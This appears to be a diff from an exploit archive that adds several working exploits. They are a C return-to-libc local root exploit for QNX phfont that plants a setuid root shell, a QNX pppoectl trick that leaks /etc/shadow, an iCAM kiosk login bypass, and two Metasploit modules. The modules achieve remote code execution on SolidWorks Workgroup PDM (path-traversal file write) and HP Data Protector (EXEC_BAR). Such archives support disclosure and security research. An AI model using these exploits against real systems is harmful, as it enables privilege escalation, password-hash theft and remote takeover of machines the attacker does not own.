#define VULN "PHOTON_PATH="
#define OFFSET 416
#define FILENAME "/tmp/sh"
static void createshell(void);
static void fail(void);
static void checknull(unsigned int addr);
static unsigned int find_string(char *s);
static unsigned int is_string(unsigned int addr, char *string);
static unsigned int find_libc(char *syscall);
void createshell(void) {
int fd;
char *s="/bin/cp /bin/sh /tmp/shell\n"
"/bin/chmod 4755 /tmp/shell\n"
"/bin/chown root:root /tmp/shell\n";
fd = open(FILENAME, O_RDWR|O_CREAT, S_IRWXU|S_IXGRP|S_IXOTH);
if (fd < 0)
errx(1, "cannot open %s for writing", FILENAME);
write(fd, s, strlen(s));
close(fd);
}
void
checknull(unsigned int addr)
{
if (!(addr & 0xff) || \
!(addr & 0xff00) || \
!(addr & 0xff0000) || \
!(addr & 0xff000000))
errx(1, "return-to-libc failed: " \
"0x%x contains a null byte", addr);
}
void
fail(void)
{
printf("\n");
errx(1, "return-to-libc failed");
}
unsigned int
is_string(unsigned int addr, char *string)
{
char *a = addr;
signal(SIGSEGV, fail);
if (strcmp(a, string) == 0)
return(0);
return(1);
}
unsigned int
find_string(char *string)
{
unsigned int i;
printf("[-] %s: ", string);
for (i = 0xb0300000; i < 0xdeadbeef; i++) {
if (is_string(i, string) != 0)
continue;
printf("0x%x\n", i);
checknull(i);
return(i);
}
return(1);
}
unsigned int
find_libc(char *syscall)
{
void *s;
unsigned int syscall_addr;
if (!(s = dlopen(NULL, RTLD_LAZY)))
errx(1, "error: dlopen() failed");
if (!(syscall_addr = (unsigned int)dlsym(s, syscall)))
errx(1, "error: dlsym() %s", syscall);
printf("[-] %s(): 0x%x\n", syscall, syscall_addr);
checknull(syscall_addr);
return(syscall_addr);
return(1);
}
int
main(int argc, char **argv)
{
unsigned int system_addr;
unsigned int exit_addr;
unsigned int sh_addr;
char env[440];
printf("%s\n\n", HEADER);
createshell();
system_addr = find_libc("system");
exit_addr = find_libc("exit");
sh_addr = find_string("sh");
memset(env, 0xEB, sizeof(env));
memcpy(env + OFFSET, (char *)&system_addr, 4);
memcpy(env + OFFSET + 4, (char *)&exit_addr, 4);
memcpy(env + OFFSET + 8, (char *)&sh_addr, 4);
setenv("PHOTON_PATH", env, 0);
system("PATH=/tmp:/bin:/sbin:/usr/bin:/usr/sbin /usr/photon/bin/phfont");
printf("[-] now dropping into root shell...\n");
sleep(2);
if (unlink(FILENAME) != 0)
printf("error: cannot unlink %s\n", FILENAME);
system("/tmp/shell");
return(0);
}

26
platforms/qnx/local/32156.txt Executable file
View file

@ -0,0 +1,26 @@
#
# QNX 6.4.x/6.5.x pppoectl disclose /etc/shadow by cenobyte 2013
# <vincitamorpatriae@gmail.com>
#
# - vulnerability description:
# QNX setuid root /sbin/pppoectl allows any user to gain access to privileged
# information such as the root password hash.
#
# The vulnerability exists because of a failure to drop privileges or check the
# permissions and ownership on the file specified as the configuration file.
#
# If a user specifies a file such as /etc/shadow, pppoectl will display the
# first line of the shadow file in the error output.
#
# - vulnerable platforms:
# QNX 6.5.0SP1
# QNX 6.5.0
# QNX 6.4.1
$ id
uid=100(user) gid=100
$ ls -la /etc/shadow
-rw------- 1 root root 69 Oct 10 16:55 /etc/shadow
$ pppoectl -f /etc/shadow lo0
pppoectl: bad parameter: "root:QSkSGrRQOSLoO:1380296317:0:0"

24
platforms/windows/local/32158.txt Executable file
View file

@ -0,0 +1,24 @@
# Exploit Title: iCAM Workstation Control Software Local Authentication Bypass
# Google Dork:
# Vendor: Insight Media Internet Limited is based in the North West of England, and has 10 years experience in developing both internet and software solutions.
Our staff are focused and committed to offering the best possible service and assistance to customers both old and new.
# Product: iCAM Workstation Control is a PC booking system designed to give organisations complete control over the access and pre-booking of publicly accessible workstations.
# Details: There is a simple local exploit in iCAM workstation control which allows a user to bypass the login screen and access the Local Disk Drive to launch applications such as a Web Browser.
# Exploitation-Technique: Local
# Date: 06-03-2014
# Exploit Author: StealthHydra
# Vendor Homepage: http://www.insight-media.co.uk/index.php?id=9
# Software Link:
# Version: 4.8.0.0
# Tested on: Windows 7
# CVE :
# Method:
=========
1.) From the login screen most keys are blocked accept alphanumeric keys. However if you press the Alt & Tab hotkey then you can access the desktop of the user currently running the iCAM client.
2.) Although a blank desktop, you can then press the shortcut for the Windows Help feature - Windows key & F1
3.) Once in the windows help if you type in a random string into the search box and press enter, windows explorer appears.
4.) Once in the windows explorer you can launch various applications by navigating the windows file system.

150
platforms/windows/remote/32163.rb Executable file
View file

@ -0,0 +1,150 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::EXE
include Msf::Exploit::WbemExec
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(
info,
'Name' => 'SolidWorks Workgroup PDM 2014 pdmwService.exe Arbitrary File Write',
'Description' => %q{
This module exploits a remote arbitrary file write vulnerability in
SolidWorks Workgroup PDM 2014 SP2 and prior.
For targets running Windows Vista or newer the payload is written to the
startup folder for all users and executed upon next user logon.
For targets before Windows Vista code execution can be achieved by first
uploading the payload as an exe file, and then upload another mof file,
which schedules WMI to execute the uploaded payload.
This module has been tested successfully on SolidWorks Workgroup PDM
2011 SP0 on Windows XP SP3 (EN) and Windows 7 SP1 (EN).
},
'License' => MSF_LICENSE,
'Author' =>
[
'Mohamed Shetta <mshetta[at]live.com>', # Initial discovery and PoC
'Brendan Coles <bcoles[at]gmail.com>', # Metasploit
],
'References' =>
[
['EDB', '31831'],
['OSVDB', '103671']
],
'Payload' =>
{
'BadChars' => "\x00"
},
'Platform' => 'win',
'Targets' =>
[
# Tested on:
# - SolidWorks Workgroup PDM 2011 SP0 (Windows XP SP3 - EN)
# - SolidWorks Workgroup PDM 2011 SP0 (Windows 7 SP1 - EN)
['Automatic', { 'auto' => true } ], # both
['SolidWorks Workgroup PDM <= 2014 SP2 (Windows XP SP0-SP3)', {}],
['SolidWorks Workgroup PDM <= 2014 SP2 (Windows Vista onwards)', {}],
],
'Privileged' => true,
'DisclosureDate' => 'Feb 22 2014',
'DefaultTarget' => 0))
register_options([
OptInt.new('DEPTH', [true, 'Traversal depth', 10]),
Opt::RPORT(30000)
], self.class)
end
def peer
"#{rhost}:#{rport}"
end
#
# Check
#
def check
# op code
req = "\xD0\x07\x00\x00"
# filename length
req << "\x00\x00\x00\x00"
# data length
req << "\x00\x00\x00\x00"
connect
sock.put req
res = sock.get_once
disconnect
if !res
vprint_error "#{peer} - Connection failed."
Exploit::CheckCode::Unknown
elsif res == "\x00\x00\x00\x00"
vprint_status "#{peer} - Received reply (#{res.length} bytes)"
Exploit::CheckCode::Detected
else
vprint_warning "#{peer} - Unexpected reply (#{res.length} bytes)"
Exploit::CheckCode::Safe
end
end
#
# Send a file
#
def upload(fname, data)
# every character in the filename must be followed by 0x00
fname = fname.scan(/./).join("\x00") + "\x00"
# op code
req = "\xD0\x07\x00\x00"
# filename length
req << "#{[fname.length].pack('l')}"
# file name
req << "#{fname}"
# data length
req << "#{[data.length].pack('l')}"
# data
req << "#{data}"
connect
sock.put req
res = sock.get_once
disconnect
if !res
fail_with(Failure::Unknown, "#{peer} - Connection failed.")
elsif res == "\x00\x00\x00\x00"
print_status "#{peer} - Received reply (#{res.length} bytes)"
else
print_warning "#{peer} - Unexpected reply (#{res.length} bytes)"
end
end
#
# Exploit
#
def exploit
depth = '..\\' * datastore['DEPTH']
exe = generate_payload_exe
exe_name = "#{rand_text_alpha(rand(10) + 5)}.exe"
if target.name =~ /Automatic/ or target.name =~ /Vista/
print_status("#{peer} - Writing EXE to startup for all users (#{exe.length} bytes)")
upload("#{depth}\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\#{exe_name}", exe)
end
if target.name =~ /Automatic/ or target.name =~ /XP/
print_status("#{peer} - Sending EXE (#{exe.length} bytes)")
upload("#{depth}\\WINDOWS\\system32\\#{exe_name}", exe)
mof_name = "#{rand_text_alpha(rand(10) + 5)}.mof"
mof = generate_mof(::File.basename(mof_name), ::File.basename(exe_name))
print_status("#{peer} - Sending MOF (#{mof.length} bytes)")
upload("#{depth}\\WINDOWS\\system32\\wbem\\mof\\#{mof_name}", mof)
register_file_for_cleanup("wbem\\mof\\good\\#{::File.basename(mof_name)}")
end
register_file_for_cleanup("#{::File.basename(exe_name)}")
end
end

206
platforms/windows/remote/32164.rb Executable file
View file

@ -0,0 +1,206 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Powershell
include Msf::Exploit::CmdStagerVBS
def initialize(info = {})
super(update_info(info,
'Name' => 'HP Data Protector Backup Client Service Remote Code Execution',
'Description' => %q{
This module abuses the Backup Client Service (OmniInet.exe) to achieve remote code
execution. The vulnerability exists in the EXEC_BAR operation, which allows to
execute arbitrary processes. This module has been tested successfully on HP Data
Protector 6.20 on Windows 2003 SP2 and Windows 2008 R2.
},
'Author' =>
[
'Aniway.Anyway <Aniway.Anyway[at]gmail.com>', # Vulnerability discovery
'juan vazquez' # Metasploit module
],
'References' =>
[
[ 'CVE', '2013-2347' ],
[ 'BID', '64647' ],
[ 'ZDI', '14-008' ],
[ 'URL', 'https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03822422' ],
[ 'URL', 'http://ddilabs.blogspot.com/2014/02/fun-with-hp-data-protector-execbar.html' ]
],
'Privileged' => true,
'Payload' =>
{
'DisableNops' => true
},
'DefaultOptions' =>
{
'DECODERSTUB' => File.join(Msf::Config.data_directory, "exploits", "cmdstager", "vbs_b64_noquot")
},
'Platform' => 'win',
'Targets' =>
[
[ 'HP Data Protector 6.20 build 370 / VBScript CMDStager', { } ],
[ 'HP Data Protector 6.20 build 370 / Powershell', { } ]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jan 02 2014'))
register_options(
[
Opt::RPORT(5555),
OptString.new('CMDPATH', [true, 'The cmd.exe path', 'c:\\windows\\system32\\cmd.exe'])
],
self.class)
end
def check
fingerprint = get_fingerprint
if fingerprint.nil?
return Exploit::CheckCode::Unknown
end
print_status("#{peer} - HP Data Protector version #{fingerprint}")
if fingerprint =~ /HP Data Protector A\.06\.(\d+)/
minor = $1.to_i
else
return Exploit::CheckCode::Safe
end
if minor < 21
return Exploit::CheckCode::Appears
elsif minor == 21
return Exploit::CheckCode::Detected
else
return Exploit::CheckCode::Detected
end
end
def exploit
if target.name =~ /VBScript CMDStager/
# 7500 just in case, to be sure the command fits after
# environment variables expansion
execute_cmdstager({:linemax => 7500})
elsif target.name =~ /Powershell/
# Environment variables are not being expanded before, neither in CreateProcess
command = cmd_psh_payload(payload.encoded).gsub(/%COMSPEC% /, "")
if command.length > 8000
# Windows 2008 Command Prompt Max Length is 8191
fail_with(Failure::BadConfig, "#{peer} - The selected paylod is too long to execute through powershell in one command")
end
print_status("#{peer} - Exploiting through Powershell...")
exec_bar(datastore['CMDPATH'], command, "\x00")
end
end
def peer
"#{rhost}:#{rport}"
end
def build_pkt(fields)
data = "\xff\xfe" # BOM Unicode
fields.each do |v|
data << "#{Rex::Text.to_unicode(v)}\x00\x00"
data << Rex::Text.to_unicode(" ") # Separator
end
data.chomp!(Rex::Text.to_unicode(" ")) # Delete last separator
return [data.length].pack("N") + data
end
def get_fingerprint
ommni = connect
ommni.put(rand_text_alpha_upper(64))
resp = ommni.get_once(-1)
disconnect
if resp.nil?
return nil
end
Rex::Text.to_ascii(resp).chop.chomp # Delete unicode last null
end
def exec_bar(cmd, *args)
connect
pkt = build_pkt([
"2", # Message Type
rand_text_alpha(8),
rand_text_alpha(8),
rand_text_alpha(8),
rand_text_alpha(8),
rand_text_alpha(8),
"11", # Opcode EXEC_BAR
rand_text_alpha(8),
rand_text_alpha(8),
rand_text_alpha(8),
rand_text_alpha(8),
rand_text_alpha(8),
rand_text_alpha(8),
rand_text_alpha(8),
rand_text_alpha(8),
rand_text_alpha(8),
rand_text_alpha(8),
rand_text_alpha(8),
"#{cmd}", # Executable
rand_text_alpha(8)
].concat(args))
sock.put(pkt)
# In my testings the default timeout (10) isn't enough
begin
res = sock.get_once(-1, 20)
rescue EOFError # happens when using the Powershell method
disconnect
return
end
fail_with(Failure::Unknown, "#{peer} - Expected answer not received... aborting...") unless exec_bar?(res)
disconnect
end
def exec_bar?(data)
return false if data.blank?
data_unpacked = data.unpack("NnVv")
data_unpacked.length == 4 && data_unpacked[0] == 8 && data_unpacked[1] == 0xfffe && data_unpacked[2] == 0x36 && data_unpacked[3] == 0
end
def execute_command(cmd, opts = {})
exec_bar(datastore['CMDPATH'], "/c #{cmd}", "\x00")
end
def get_vbs_string(str)
vbs_str = ""
str.each_byte { |b|
vbs_str << "Chr(#{b})+"
}
return vbs_str.chomp("+")
end
# Make the modifications required to the specific encoder
# This exploit uses an specific encoder because quotes (")
# aren't allowed when injecting commands
def execute_cmdstager_begin(opts)
var_decoded = @stager_instance.instance_variable_get(:@var_decoded)
var_encoded = @stager_instance.instance_variable_get(:@var_encoded)
decoded_file = "#{var_decoded}.exe"
encoded_file = "#{var_encoded}.b64"
@cmd_list.each do |command|
# Because the exploit kills cscript processes to speed up and reliability
command.gsub!(/cscript \/\/nologo/, "wscript //nologo")
command.gsub!(/CHRENCFILE/, get_vbs_string(encoded_file))
command.gsub!(/CHRDECFILE/, get_vbs_string(decoded_file))
end
end
end